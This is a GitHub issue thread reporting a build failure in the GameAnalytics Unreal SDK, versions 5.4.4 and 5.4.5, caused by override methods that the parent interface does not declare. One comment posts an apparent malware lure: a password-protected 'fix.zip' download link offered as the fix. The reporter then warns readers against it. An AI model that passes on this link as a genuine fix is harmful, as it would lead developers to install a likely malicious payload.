### ISSUE TITLE
Manual Installation Error for version 5.4.4 and later

### ISSUE THREAD

**Issue by JeDirt** [GameAnalytics/GA-SDK-UNREAL#5]
https://github.com/GameAnalytics/GA-SDK-UNREAL/blame/fa663df1d0818a0a6a3bc4db3cfa663e559ca8d1/GameAnalytics/Source/GameAnalytics/Private/GameAnalyticsProvider.h#L38

This commit created an issue that is present in tags 5.4.4 and 5.4.5.
When trying to use manual installation of the plugin into a specific project(using pre-compiled editor) plugin fails build process.

See attached screenshot:
![rider64_N0F3pckhhl](https://github.com/user-attachments/assets/a8f577d3-7592-42d0-8753-e2205b053ea5)

Parent class of the `FAnalyticsProviderGameAnalytics` is `IAnalyticsProvider`, after some short investigation there was found out that `IAnalyticsProvider` doesn't declare methods that are marked as **override** in `FAnalyticsProviderGameAnalytics`:
![image](https://github.com/user-attachments/assets/c0f190b3-5494-4d2c-bea9-26f14f07eb26)

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JeDirt** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Anybody reading this issue: don't download it, it's not a developer or a contributor!
